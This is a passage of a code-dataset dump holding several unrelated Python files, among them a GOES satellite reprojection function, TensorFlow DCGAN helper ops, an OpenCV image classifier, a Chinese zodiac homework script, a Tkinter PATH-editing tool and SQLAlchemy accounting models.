transaction_table_ids_lookup.append(champ)\n\n champ_index = transaction_table_ids_lookup.index(champ)\n win_transaction[champ_index] = 1\n\n winning_champs_transaction_table.append(win_transaction)\n\nfor match in losing_champs:\n loss_transaction = [0] * number_of_champions\n\n for champ in match.get('losing_champions'):\n if champ not in transaction_table_ids_lookup:\n transaction_table_ids_lookup.append(champ)\n\n champ_index = transaction_table_ids_lookup.index(champ)\n loss_transaction[champ_index] = 1\n\n losing_champs_transaction_table.append(loss_transaction)\n\n# Write transactions to files\nwin_file = open('win_transactions.txt', 'w')\nwin_file_class = open('win_transactions_classifier.txt', 'w')\nprint(*[champ.replace(' ', '')\n for champ in transaction_table_ids_lookup], file=win_file)\nfor match in winning_champs_transaction_table:\n match_classifier = [*match, 1]\n print(*match, file=win_file)\n print(*match_classifier, file=win_file_class)\nwin_file.close()\nwin_file_class.close()\n\nloss_file = open('loss_transactions.txt', 'w')\nloss_file_class = open('loss_transactions_classifier.txt', 'w')\nprint(*[champ.replace(' ', '')\n for champ in transaction_table_ids_lookup], file=loss_file)\nfor match in 
losing_champs_transaction_table:\n match_classifier = [*match, -1]\n print(*match, file=loss_file)\n print(*match_classifier, file=loss_file_class)\nloss_file.close()\nloss_file_class.close()\n","sub_path":"database_scripts/champions_transactions.py","file_name":"champions_transactions.py","file_ext":"py","file_size_in_byte":3299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"442204579","text":"########################################\r\n# GOES projection conversion to Lat/Lon\r\n# Function to be read in by other code\r\n#######################################\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport geopandas as gpd\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nimport netCDF4 as nc\r\nfrom matplotlib.backends.backend_pdf import PdfPages\r\nimport cartopy.crs as ccrs\r\nimport cartopy\r\nimport cartopy.feature as cfeature\r\nimport matplotlib as mpl\r\n\r\n\r\ndef lat_lon_reproj(root,file):\r\n\tds = nc.Dataset(os.path.join(root, file))\r\n\t########################################\r\n\t# Designate dataset\r\n\t#######################################\r\n\tvar_names = [ii for ii in ds.variables]\r\n\tvar_name = var_names[0]\r\n\ttry:\r\n\t\tband_id = ds.variables['band_id'][:]\r\n\t\tband_id = ' (Band: {},'.format(band_id[0])\r\n\t\tband_wavelength = ds.variables['band_wavelength']\r\n\t\tband_wavelength_units = band_wavelength.units\r\n\t\tband_wavelength_units = '{})'.format(band_wavelength_units)\r\n\t\tband_wavelength = ' {0:.2f} '.format(band_wavelength[:][0])\r\n\t\tprint('Band ID: {}'.format(band_id))\r\n\t\tprint('Band Wavelength: {} {}'.format(band_wavelength,band_wavelength_units))\r\n\texcept:\r\n\t\tband_id = ''\r\n\t\tband_wavelength = ''\r\n\t\tband_wavelength_units = ''\r\n\t############################################################\r\n\t# GOES-R projection info and retrieving relevant constants\r\n\t############################################################\r\n\tproj_info = ds.variables['goes_imager_projection']\r\n\tlon_origin = proj_info.longitude_of_projection_origin\r\n\tH = proj_info.perspective_point_height+proj_info.semi_major_axis\r\n\tr_eq = proj_info.semi_major_axis\r\n\tr_pol = proj_info.semi_minor_axis\r\n\t########################################\r\n\t# grid info\r\n\t########################################\r\n\tlat_rad_1d = ds.variables['x'][:]\r\n\tlon_rad_1d = ds.variables['y'][:]\r\n\t########################################\r\n\t# data info\r\n\t########################################\r\n\tdata = ds.variables[var_name][:]\r\n\tdata_units = ds.variables[var_name].units\r\n\tdata_time_grab = ((ds.time_coverage_end).replace('T',' ')).replace('Z','')\r\n\tdata_long_name = ds.variables[var_name].long_name\r\n\t########################################\r\n\t# create meshgrid filled with radian angles\r\n\t########################################\r\n\tlat_rad,lon_rad = np.meshgrid(lat_rad_1d,lon_rad_1d)\r\n\t########################################\r\n\t# lat/lon calc routine from satellite radian angle vectors\r\n\t########################################\r\n\tlambda_0 = (lon_origin*np.pi)/180.0\r\n\t#\r\n\ta_var = np.power(np.sin(lat_rad),2.0) + (np.power(np.cos(lat_rad),2.0)*(np.power(np.cos(lon_rad),2.0)+(((r_eq*r_eq)/(r_pol*r_pol))*np.power(np.sin(lon_rad),2.0))))\r\n\tb_var = -2.0*H*np.cos(lat_rad)*np.cos(lon_rad)\r\n\tc_var = (H**2.0)-(r_eq**2.0)\r\n\t#\r\n\tr_s = (-1.0*b_var - np.sqrt((b_var**2)-(4.0*a_var*c_var)))/(2.0*a_var)\r\n\t#\r\n\ts_x = 
r_s*np.cos(lat_rad)*np.cos(lon_rad)\r\n\ts_y = - r_s*np.sin(lat_rad)\r\n\ts_z = r_s*np.cos(lat_rad)*np.sin(lon_rad)\r\n\t################################\r\n\t# Get Lat/Lon\r\n\t################################\r\n\tlat = (180.0/np.pi)*(np.arctan(((r_eq*r_eq)/(r_pol*r_pol))*((s_z/np.sqrt(((H-s_x)*(H-s_x))+(s_y*s_y))))))\r\n\tlon = (lambda_0 - np.arctan(s_y/(H-s_x)))*(180.0/np.pi)\r\n\t################################\r\n\t# Return vars\r\n\t################################\r\n\treturn lon,lat,data,data_units,data_time_grab,data_long_name,band_id,band_wavelength,band_wavelength_units,var_name, lat_rad, lon_rad, lat_rad_1d, lon_rad_1d","sub_path":"Single_file_plotting/GOES_LL_Conv.py","file_name":"GOES_LL_Conv.py","file_ext":"py","file_size_in_byte":3466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"359605180","text":"#!/usr/bin/env python3\r\n\r\n### Copyright 2017 Adam Maynard\r\n### Licensed under the Apache License, Version 2.0 (the \"License\");\r\n### you may not use this file except in compliance with the License.\r\n### You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0\r\n\r\n# Build for PAN-OS 8 (should work for 7 also)\r\n\r\n## Export Palo Alto threat log as csv, then use this to filter the junk\r\nimport pandas as pd, sys, argparse, os.path\r\n\r\nparser = argparse.ArgumentParser(description='-- Removes junk columns from Palo Alto traffic log exported as CSV. --- Example: \"py csv-filter-traffic.py -i C:\\\\traffic-log.csv -o .\" (\\'.\\' = cd)')\r\nparser.add_argument(\"-i\", \"--input\", help='input source csv file (with path)')\r\nparser.add_argument(\"-o\", \"--output\", help='output path to save the new csv file')\r\nargs = parser.parse_args()\r\n\r\nwinpath = args.input\r\nnewpath = args.output\r\ninfile = winpath.replace(\"\\\\\",\"/\")\r\nsavepath = newpath.replace(\"\\\\\",\"/\")\r\n\r\nf=pd.read_csv(infile)\r\nkeep_col = ['Receive Time','Source address','Destination address','Application','Repeat Count','Source Port','Destination Port','IP Protocol','Source Country','Destination Country']\r\nnew_f = f[keep_col]\r\nnew_f.to_csv(savepath + '/' + os.path.basename(infile.rsplit( \".\", 1 )[ 0 ]) + \"-traffic.csv\", index=False)","sub_path":"csv-filter-traffic.py","file_name":"csv-filter-traffic.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"633073422","text":"import math\nimport numpy as np \nimport tensorflow as tf\n\nfrom tensorflow.python.framework import ops\n\nfrom utils import *\n#定义了一堆变量:image_summary 、scalar_summary、histogram_summary、merge_summary、SummaryWriter,都是从相应的tensorflow中获取的。如果可是直接获取,则获取,否则从tf.summary中获取。\ntry:\n image_summary = tf.image_summary\n scalar_summary = tf.scalar_summary\n histogram_summary = tf.histogram_summary\n merge_summary = tf.merge_summary\n SummaryWriter = tf.train.SummaryWriter\nexcept:\n image_summary = tf.summary.image\n scalar_summary = tf.summary.scalar\n histogram_summary = tf.summary.histogram\n merge_summary = tf.summary.merge\n SummaryWriter = tf.summary.FileWriter\n#用来拼接多个tensor\n'''\n利用dir(tf)判断”concat_v2”是否在里面,如果在的话,定义一个concat(tensors, axis, *args, **kwargs)函数,并返回tf.concat_v2(tensors, axis, *args, **kwargs);否则也定义concat(tensors, axis, *args, **kwargs)函数,只不过返回的是tf.concat(tensors, axis, *args, 
**kwargs)。其中,tf.concat使用如下:\n\nt1=tf.constant([[1,2,3],[4,5,6]])\nt2=tf.constant([[7,8,9],[10,11,12]])\nt3=tf.concat([t1,t2],0)\nt4=tf.concat([t1,t2],1)\nprint t1\nprint t2\nprint t3\nprint t4\n'''\nif \"concat_v2\" in dir(tf):\n def concat(tensors, axis, *args, **kwargs):\n return tf.concat_v2(tensors, axis, *args, **kwargs)\nelse:\n def concat(tensors, axis, *args, **kwargs):\n return tf.concat(tensors, axis, *args, **kwargs)\n#定义一个batch_norm类,包含两个函数init和call函数。首先在init(self, epsilon=1e-5, momentum = 0.9, name=”batch_norm”)函数中,定义一个name参数名字的变量,初始化self变量epsilon、momentum 、name。在call(self, x, train=True)函数中,利用tf.contrib.layers.batch_norm函数批处理规范化。\nclass batch_norm(object):\n def __init__(self, epsilon=1e-5, momentum = 0.9, name=\"batch_norm\"):\n with tf.variable_scope(name):\n self.epsilon = epsilon\n self.momentum = momentum\n self.name = name\n\n def __call__(self, x, train=True):\n return tf.contrib.layers.batch_norm(x,\n decay=self.momentum, \n updates_collections=None,\n epsilon=self.epsilon,\n scale=True,\n is_training=train,\n scope=self.name)\n#连接x,y与Int32型的[x_shapes[0], x_shapes[1], x_shapes[2], y_shapes[3]]维度的张量乘积。\ndef conv_cond_concat(x, y):\n \"\"\"Concatenate conditioning vector on feature map axis.\"\"\"\n x_shapes = x.get_shape()\n y_shapes = y.get_shape()\n return concat([\n x, y*tf.ones([x_shapes[0], x_shapes[1], x_shapes[2], y_shapes[3]])], 3)\n#定义conv2d(input_, output_dim, k_h=5, k_w=5, d_h=2,d_w=2, stddev=0.02,name=”conv2d”)函数。卷积函数:获取随机正态分布权值、实现卷积、获取初始偏置值,获取添加偏置值后的卷积变量并返回。\ndef conv2d(input_, output_dim, \n k_h=5, k_w=5, d_h=2, d_w=2, stddev=0.02,\n name=\"conv2d\"): \n #定义conv2节点:随机初始化W,\n # filter: [height, width, output_channels, in_channels]\n #W的shape为[5 5 input[-1] output_dim]\n #卷积在每一维的步长[1 2 2 1]\n #padding='SAME'时:output size(h,w) = input(h,w)/stride = input(h,w)/2\n with tf.variable_scope(name):\n w = tf.get_variable('w', [k_h, k_w, input_.get_shape()[-1], output_dim],\n initializer=tf.truncated_normal_initializer(stddev=stddev))\n conv = tf.nn.conv2d(input_, w, strides=[1, d_h, d_w, 1], padding='SAME')\n #biase 舒适化为 0\n biases = tf.get_variable('biases', [output_dim], initializer=tf.constant_initializer(0.0))\n conv = tf.reshape(tf.nn.bias_add(conv, biases), conv.get_shape())\n\n return conv\n#反卷积函数:获取随机正态分布权值、解卷积,获取初始偏置值,获取添加偏置值后的卷积变量,判断with_w是否为真,真则返回解卷积、权值、偏置值,否则返回解卷积。\ndef deconv2d(input_, output_shape,\n k_h=5, k_w=5, d_h=2, d_w=2, stddev=0.02,\n name=\"deconv2d\", with_w=False):\n with tf.variable_scope(name):\n # filter : [height, width, output_channels, in_channels]\n #初始化W W shape:[5 5 output_shape input size[-1]]注意:此处output size与input size与conv2是不同的,原因应该与tf的conv2实现内部实现有关系,暂时不清楚\n # W b 都是可以共享的,之后会与sampler共享\n w = tf.get_variable('w', [k_h, k_w, output_shape[-1], input_.get_shape()[-1]],\n initializer=tf.random_normal_initializer(stddev=stddev))\n #因为版本问题尝试使用conv2d_transpose,出现错误,使用deconv2d实现反卷积\n #反卷积与卷积的filter矩阵正好是转至关系\n try:\n deconv = tf.nn.conv2d_transpose(input_, w, output_shape=output_shape,\n strides=[1, d_h, d_w, 1])\n\n # Support for verisons of TensorFlow before 0.7.0\n except AttributeError:\n deconv = tf.nn.deconv2d(input_, w, output_shape=output_shape,\n strides=[1, d_h, d_w, 1])\n #偏差使用0初始化\n biases = tf.get_variable('biases', [output_shape[-1]], initializer=tf.constant_initializer(0.0))\n deconv = tf.reshape(tf.nn.bias_add(deconv, biases), deconv.get_shape())\n \n if with_w:\n return deconv, w, biases\n else:\n return deconv\n#leaky relu函数定义 \ndef lrelu(x, leak=0.2, name=\"lrelu\"):\n return tf.maximum(x, 
leak*x)\n#进行线性运算,获取一个随机正态分布矩阵,获取初始偏置值,如果with_w为真,则返回xw+b,权值w和偏置值b;否则返回xw+b。\n#第一项参数为input,第二项参数为output size\ndef linear(input_, output_size, scope=None, stddev=0.02, bias_start=0.0, with_w=False):\n #获取input size\n shape = input_.get_shape().as_list()\n\n with tf.variable_scope(scope or \"Linear\"):\n #根据input size 和output size,以及stddev正态初始化矩阵matrix即W\n matrix = tf.get_variable(\"Matrix\", [shape[1], output_size], tf.float32,\n tf.random_normal_initializer(stddev=stddev))\n #根据output size,初始化biase,初始化的值由linear的参数bias_start决定\n bias = tf.get_variable(\"bias\", [output_size],\n initializer=tf.constant_initializer(bias_start))\n #由参数with_w来判定是否要返回w及b\n if with_w:\n return tf.matmul(input_, matrix) + bias, matrix, bias\n else:\n return tf.matmul(input_, matrix) + bias\n","sub_path":"DCGAN-tensorflow-master_notes/ops.py","file_name":"ops.py","file_ext":"py","file_size_in_byte":6562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"574604694","text":"import sys\nimport numpy as np\nimport cv2\n\nroot = \"image/{}\"\nimgName = [\"beagle.jpg\",\"cup.jpg\",\"pineapple.jpg\",\"scooter.jpg\",\"space_shuttle.jpg\"]\n\nimgs = []\nfor n in imgName :\n img = cv2.imread(root.format(n))\n\n if img is None :\n print(\"Image load failed\")\n sys.exit()\n\n imgs.append(img)\n\n\n# model = \"dnn/bvlc_googlenet.caffemodel\"\n# config = \"dnn/deploy.prototxt\"\n\nmodel = \"dnn/googlenet-9.onnx\"\nconfig = \"\"\n\nmodelName = None \nwith open(\"dnn/classification_classes_ILSVRC2012.txt\") as f :\n modelName = f.read().rstrip(\"\\n\").split(\"\\n\")\n\nnet = cv2.dnn.readNet(model,config)\nfor img in imgs :\n blob = cv2.dnn.blobFromImage(img,1,(224,224),(104,117,123))\n net.setInput(blob)\n out = net.forward()\n idx = np.argmax(out)\n\n name = modelName[idx]\n prob = round(out[0][idx] * 100,2)\n\n cv2.putText(img, str(name)+\" \"+str(prob)+\"%\", (10,30), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,0,255),1,cv2.LINE_AA)\n\n cv2.imshow('img', img)\n cv2.waitKey()\ncv2.destroyAllWindows()\n\n","sub_path":"11.딥러닝 이해와 영상 인식/2_googlenet.py","file_name":"2_googlenet.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"249720206","text":"######################################################################\n# Author: Taran Wells\n# Username: wellst\n#\n# Assignment: A01\n#\n# Purpose: A program that returns your Chinese Zodiac animal given a\n# birth year between 1988 and 1999. Also prints your friend's animal,\n# and your compatibility with that friend's animal.\n######################################################################\n# Acknowledgements:\n# Original Author: Dr. Scott Heggen\n######################################################################\n\n# Remember to read the detailed notes about each task in the A01 document.\n\n######################################################################\n# (Required) Task 1\n# TODO Ask user for their birth year\nglobal user_sign\nglobal friend_sign\nuser_year = int(input(\"What is your birth year? \" ))\n\n# TODO Check the year using if conditionals, and print the correct animal for that year.\n# See the a01_pets.py for examples\nif user_year == 1972 or user_year == 1984 or user_year == 1996 or user_year == 2008:\n user_sign = 1\n print(\"You are a Rat! \\n\")\nelif user_year == 1973 or user_year == 1985 or user_year == 1997 or user_year == 2009:\n user_sign = 2\n print(\"You are an Ox! 
\\n\")\nelif user_year == 1974 or user_year == 1986 or user_year == 1998 or user_year == 2010:\n user_sign = 3\n print(\"You are a Tiger! \\n\")\nelif user_year == 1975 or user_year == 1987 or user_year == 1999 or user_year == 2011:\n user_sign = 4\n print(\"You are a Rabbit! \\n\")\nelif user_year == 1976 or user_year == 1988 or user_year == 2000 or user_year == 2012:\n user_sign = 5\n print(\"You are a Dragon! \\n\")\nelif user_year == 1977 or user_year == 1989 or user_year == 2001 or user_year == 2013:\n user_sign = 6\n print(\"You are a Snake! \\n\")\nelif user_year == 1978 or user_year == 1990 or user_year == 2002 or user_year == 2014:\n user_sign = 7\n print(\"You are a Horse! \\n\")\nelif user_year == 1979 or user_year == 1991 or user_year == 2003 or user_year == 2015:\n user_sign = 8\n print(\"You are a Goat! \\n\")\nelif user_year == 1980 or user_year == 1992 or user_year == 2004 or user_year == 2016:\n user_sign = 9\n print(\"You are a Monkey! \\n\")\nelif user_year == 1981 or user_year == 1993 or user_year == 2005 or user_year == 2017:\n user_sign = 10\n print(\"You are a Rooster! \\n\")\nelif user_year == 1982 or user_year == 1994 or user_year == 2006 or user_year == 2018:\n user_sign = 11\n print(\"You are a Dog! \\n\")\nelif user_year == 1983 or user_year == 1995 or user_year == 2007 or user_year == 2019:\n user_sign = 12\n print(\"You are a Pig! \\n\")\n######################################################################\n# (Required) Task 2\n# TODO Ask the user for their friend's birth year\nfriend_year = int(input(\"What is your friend's birth year?\"))\n# TODO Similar to above, check your friend's year using if conditionals, and print the correct animal for that year\nif friend_year == 1972 or friend_year == 1984 or friend_year == 1996 or friend_year == 2008:\n friend_sign = 1\n print(\"Your friend is a Rat! \\n\")\nelif friend_year == 1973 or friend_year == 1985 or friend_year == 1997 or friend_year == 2009:\n friend_sign = 2\n print(\"Your friend is an Ox! \\n\")\nelif friend_year == 1974 or friend_year == 1986 or friend_year == 1998 or friend_year == 2010:\n friend_sign = 3\n print(\"Your friend is a Tiger! \\n\")\nelif friend_year == 1975 or friend_year == 1987 or friend_year == 1999 or friend_year == 2011:\n friend_sign = 4\n print(\"Your friend is a Rabbit! \\n\")\nelif friend_year == 1976 or friend_year == 1988 or friend_year == 2000 or friend_year == 2012:\n friend_sign = 5\n print(\"Your friend is a Dragon! \\n\")\nelif friend_year == 1977 or friend_year == 1989 or friend_year == 2001 or friend_year == 2013:\n friend_sign = 6\n print(\"Your friend is a Snake! \\n\")\nelif friend_year == 1978 or friend_year == 1990 or friend_year == 2002 or friend_year == 2014:\n friend_sign = 7\n print(\"Your friend is a Horse! \\n\")\nelif friend_year == 1979 or friend_year == 1991 or friend_year == 2003 or friend_year == 2015:\n friend_sign = 8\n print(\"Your friend is a Goat! \\n\")\nelif friend_year == 1980 or friend_year == 1992 or friend_year == 2004 or friend_year == 2016:\n friend_sign = 9\n print(\"Your friend is a Monkey! \\n\")\nelif friend_year == 1981 or friend_year == 1993 or friend_year == 2005 or friend_year == 2017:\n friend_sign = 10\n print(\"Your friend is a Rooster! \\n\")\nelif friend_year == 1982 or friend_year == 1994 or friend_year == 2006 or friend_year == 2018:\n friend_sign = 11\n print(\"Your friend is a Dog! \\n\")\nelif friend_year == 1983 or friend_year == 1995 or friend_year == 2007 or friend_year == 2019:\n friend_sign = 12\n print(\"Your friend is a Pig! \\n\")\n######################################################################\n# (Optional) Task 3\n# TODO Check for compatibility between your birth year and your friend's birth year\n# NOTE: You can always assume the first input is your birth year.\n# This way, you are not writing a ton of code to consider every possibility.\n# In other words, only do one row of the sample compatibility table.\nif user_sign == 1:\n if friend_sign in (1, 5, 9):\n print(\"You two are a great match!\")\n elif friend_sign in (2, 3, 4, 6, 8, 10, 11, 12):\n print(\"You two are a match!\")\n elif friend_sign == 7:\n print(\"You two are not a match!\")\nelif user_sign == 2:\n if friend_sign in (1, 3, 4, 5, 7, 9, 11, 12):\n print(\"You two are a match!\")\n elif friend_sign in (2, 6, 10):\n print(\"You two are a great match!\")\n elif friend_sign == 8:\n print(\"You two are not a match!\")\nelif user_sign == 3:\n if friend_sign in (1, 2, 4, 5, 6, 8, 10, 12):\n print(\"You two are a match!\")\n elif friend_sign in (3, 7, 11):\n print(\"You two are a great match!\")\n elif friend_sign == 9:\n print(\"You two are not a match!\")\nelif user_sign == 4:\n if friend_sign in (1, 2, 3, 5, 6, 7, 9, 11):\n print(\"You two are a match!\")\n elif friend_sign in (4, 8, 12):\n print(\"You two are a great match!\")\n elif friend_sign == 10:\n print(\"You two are not a match!\")\nelif user_sign == 5:\n if friend_sign in (1, 5, 9):\n print(\"You two are a great match!\")\n elif friend_sign in (2, 3, 4, 6, 7, 8, 10, 12):\n print(\"You two are a match!\")\n elif friend_sign == 11:\n print(\"You two are not a match!\")\nelif user_sign == 6:\n if friend_sign in (1, 3, 4, 5, 7, 8, 9, 11):\n print(\"You two are a match!\")\n elif friend_sign in (2, 6, 10):\n print(\"You two are a great match!\")\n elif friend_sign == 12:\n print(\"You two are not a match!\")\nelif user_sign == 7:\n if friend_sign == 1:\n print(\"You two are not a match!\")\n elif friend_sign in (2, 4, 5, 6, 8, 9, 10, 12):\n print(\"You two are a match!\")\n elif friend_sign in (3, 11, 7):\n print(\"You two are a great match!\")\nelif user_sign == 8:\n if friend_sign in (1, 3, 5, 6, 7, 9, 10, 11):\n print(\"You two are a match!\")\n elif friend_sign == 2:\n print(\"You two are not a match!\")\n elif friend_sign in (4, 8, 12):\n print(\"You two are a great match!\")\nelif user_sign == 9:\n if friend_sign in (1, 5, 9):\n print(\"You two are a great match!\")\n elif friend_sign in (2, 4, 6, 7, 8, 10, 11, 12):\n print(\"You two are a match!\")\n elif friend_sign == 3:\n print(\"You two are not a match!\")\nelif user_sign == 10:\n if friend_sign in (1, 3, 5, 7, 8, 9, 11, 12):\n print(\"You two are a match!\")\n elif friend_sign in (2, 6, 10):\n print(\"You two are a great match!\")\n elif friend_sign == 4:\n print(\"You two are not a match!\")\nelif user_sign == 11:\n if friend_sign in (1, 2, 4, 6, 8, 9, 10, 12):\n print(\"You two are a match!\")\n elif friend_sign in (3, 7, 11):\n print(\"You two are a great match!\")\n elif friend_sign == 5:\n print(\"You two are not a match!\")\nelif user_sign == 12:\n if friend_sign in (1, 2, 3, 5, 7, 9, 10, 11):\n print(\"You two are a match!\")\n elif friend_sign in (4, 8, 12):\n print(\"You two are a great match!\")\n elif friend_sign == 6:\n print(\"You two are not a match!\")\n# TODO print if you are a strong match, no match, or in between\n","sub_path":"a01_stubs.py","file_name":"a01_stubs.py","file_ext":"py","file_size_in_byte":8490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}{"seq_id":"316936208","text":"\"\"\"\nLab 4:\n\"\"\"\n\ndef main():\n price = get_ticket_price(5, 20, True, False)\n print(\"$\" + str(price))\n print(\"$\" + str(get_ticket_price(5, 20, False, True)))\n print(\"$\" + str(get_ticket_price(5, 20, False, False)))\n print(\"$\" + str(get_ticket_price(15, 25, False, True)))\n\ndef get_ticket_price(number_of_tickets, ticket_price, has_discount, is_a_member):\n total_price = number_of_tickets * ticket_price\n if has_discount and is_a_member:\n end_price = round(0.8 * total_price)\n return end_price\n elif has_discount:\n end_price = round(0.85 * total_price)\n return end_price\n elif is_a_member:\n end_price = round(0.9 * total_price)\n return end_price\n else:\n return total_price\n\nmain()\n\n\n\n\n\n\n\n\n","sub_path":"Lab 4 Q2.py","file_name":"Lab 4 Q2.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}{"seq_id":"124859957","text":"import sys\nsys.path.append('C:\\\\Users\\\\ZFY\\\\PycharmProjects\\\\AutoFE')\nsys.path.append('/home/zhangyanfeng/AutoFE')\n# sys.path.append('/Users/mac/PycharmProjects/AutoFE')\nsys.path.append('/GPUFS/ecnu_cqjin_caipeng/AutoFE')\nfrom related_work.RL_AAAI_2018.env.TitanicEnv import TitanicEnv\nfrom related_work.RL_AAAI_2018.agent.agent import DQNAgent\nimport warnings\nfrom utils import init_seed\nwarnings.filterwarnings('ignore')\n\nif __name__ == \"__main__\":\n init_seed.init_seed()\n\n env = TitanicEnv(5)\n load_name = 'Titanic'\n\n num_frames = 50000\n memory_size = 1000\n batch_size = 64\n target_update = 200\n epsilon_decay = 1 / 10000\n\n agent = DQNAgent(env, memory_size, batch_size, target_update, epsilon_decay, load_name, True)\n\n agent.train(num_frames)\n","sub_path":"related_work/RL_AAAI_2018/titanic.py","file_name":"titanic.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}{"seq_id":"311350287","text":"import os\nimport sys\nfrom tkinter import *\nfrom tkinter import ttk\n \nroot = Tk()\nroot.title(\"AddToPath\")\nroot.resizable(False,False)\n\naddinginfo = StringVar()\naddinginfo.set(\"Enter path and click Add button\")\ndef addtopath(*args):\n try:\n os.system(\"touch ~/.bash_profile\")\n pathvalue = str(topath.get())\n addinginfo.set(str(\"Loading BASH...\"))\n command = \"export PATH=$PATH:\"\n fullcommand = command + pathvalue\n addinginfo.set(str(\"Adding the path to your mac PATH...\"))\n os.system(fullcommand)\n os.system(\"source $HOME/.bash_profile\")\n addinginfo.set(str(\"Successful!\"))\n except ValueError:\n addinginfo.set(str(\"Adding to PATH error!\"))\n pass\n\nmainframe = ttk.Frame(root,width=30, padding=\"3 3 12 12\")\nmainframe.grid(column=0, row=0, sticky=(N, W, E, S))\nmainframe.columnconfigure(0, weight=1)\nmainframe.rowconfigure(0, weight=1)\n\ntopath = StringVar()\nshowallpaths = StringVar()\n\nfeet_entry = ttk.Entry(mainframe,width=25, textvariable=topath)\nfeet_entry.grid(column=1, row=1, sticky=(W))\n\nttk.Button(mainframe, text=\"Add\",width=5, command=addtopath).grid(column=1, row=1, sticky=E)\npathslistbox = Listbox(mainframe,width=30, 
height=10)\npathslistbox.grid(column=1, row=3, sticky=(W,E))\nttk.Sizegrip().grid(column=1, row= 3, sticky=(S,E))\n\n \nttk.Label(mainframe, textvariable=addinginfo).grid(column=1, row=2, sticky=(W,E))\n\nallpaths = str(os.popen(\"echo $PATH\").readlines()[0])\nlistforpaths = allpaths.split(':')\n\nif len(listforpaths) > 10:\n s = ttk.Scrollbar(pathslistbox, orient=VERTICAL, command=pathslistbox.yview)\n s.grid(column=1, row=3, sticky=(N,S))\n pathslistbox['yscrollcommand'] = s.set\n\nfor i in listforpaths:\n pathslistbox.insert('end',i)\n\nroot.mainloop()","sub_path":"topath.py","file_name":"topath.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"586973002","text":"# Copyright (c) 2016, AB Uobis\n# All rights reserved.\n\nfrom xac import db\nfrom sqlalchemy.dialects.postgresql import JSON\nfrom sqlalchemy import BigInteger\n\n\n# Memoranda are source documents from which accounting information is extracted to form General Journal entries. As a preliminary step, all of the details for each individual transaction are extracted from the source document to a dictionary.\n\n\nclass Memoranda(db.Model):\n id = db.Column(db.Text, primary_key=True)\n date = db.Column(db.DateTime, index=True)\n fileName = db.Column(db.Text, unique=True)\n fileType = db.Column(db.Text)\n fileSize = db.Column(BigInteger)\n fileText = db.Column(db.Text)\n\nclass MemorandaTransactions(db.Model):\n id = db.Column(db.Text, primary_key=True)\n txid = db.Column(db.Text)\n details = db.Column(JSON) # Replace (db.Text) with (JSON) for pg\n memoranda_id = db.Column(db.Text, db.ForeignKey('memoranda.id'))\n\nclass BitcoinTransactions(db.Model):\n # txid of the bitcoins received\n txid = db.Column(db.Text, primary_key=True)\n # output index of the bitcoins received\n output_index = db.Column(db.Integer, primary_key=True)\n # address the bitcoins were received with\n output_address = db.Column(db.Text)\n amount = db.Column(BigInteger)\n unspent = db.Column(db.Boolean)\n last_updated = db.Column(db.DateTime)\n memoranda_transactions_id = db.Column(db.Text, db.ForeignKey('memoranda_transactions.id'))\n\nclass Elements(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.Text, unique=True)\n classifications = db.relationship('Classifications', backref='element', lazy='select', cascade=\"save-update, merge, delete\")\n \n def __repr__(self):\n return self.name\n\nclass Classifications(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.Text, unique=True)\n parent = db.Column(db.Text, db.ForeignKey('elements.name'))\n accounts = db.relationship('Accounts', backref='classification', lazy='select', cascade=\"save-update, merge, delete\")\n \n def __repr__(self):\n return self.name\n \nclass Accounts(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.Text, unique=True)\n parent = db.Column(db.Text, db.ForeignKey('classifications.name'))\n subaccounts = db.relationship('Subaccounts', backref='account', lazy='select', cascade=\"save-update, merge, delete\")\n \n def __repr__(self):\n return self.name\n\nclass Subaccounts(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.Text, unique=True)\n parent = db.Column(db.Text, db.ForeignKey('accounts.name'))\n ledgerentries = db.relationship('LedgerEntries', backref='subaccount', lazy='select', cascade=\"save-update, merge, delete\")\n \n def __repr__(self):\n return self.name\n\nclass 
JournalEntries(db.Model):\n id = db.Column(db.Text, primary_key=True)\n memoranda_transactions_id = db.Column(db.Text, db.ForeignKey('memoranda_transactions.id'))\n ledgerentries = db.relationship('LedgerEntries', backref='journalentry', lazy='select', cascade=\"save-update, merge, delete\", order_by=\"desc(LedgerEntries.tside), desc(LedgerEntries.amount)\")\n\nclass LedgerEntries(db.Model):\n id = db.Column(db.Text, primary_key=True)\n date = db.Column(db.DateTime)\n tside = db.Column(db.Text)\n amount = db.Column(db.Numeric)\n currency = db.Column(db.Text)\n ledger = db.Column(db.Text, db.ForeignKey('subaccounts.name'))\n journal_entry_id = db.Column(db.Text, db.ForeignKey('journal_entries.id'))\n\nclass PriceFeeds(db.Model):\n price_id = db.Column(db.Integer, primary_key=True)\n timestamp = db.Column(db.BigInteger)\n price = db.Column(db.Numeric)\n volume = db.Column(db.Numeric)\n\nclass Rates(db.Model):\n date = db.Column(db.BigInteger, primary_key=True)\n source = db.Column(db.Text)\n currency = db.Column(db.Text)\n rate = db.Column(db.Numeric)\n","sub_path":"xac/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} 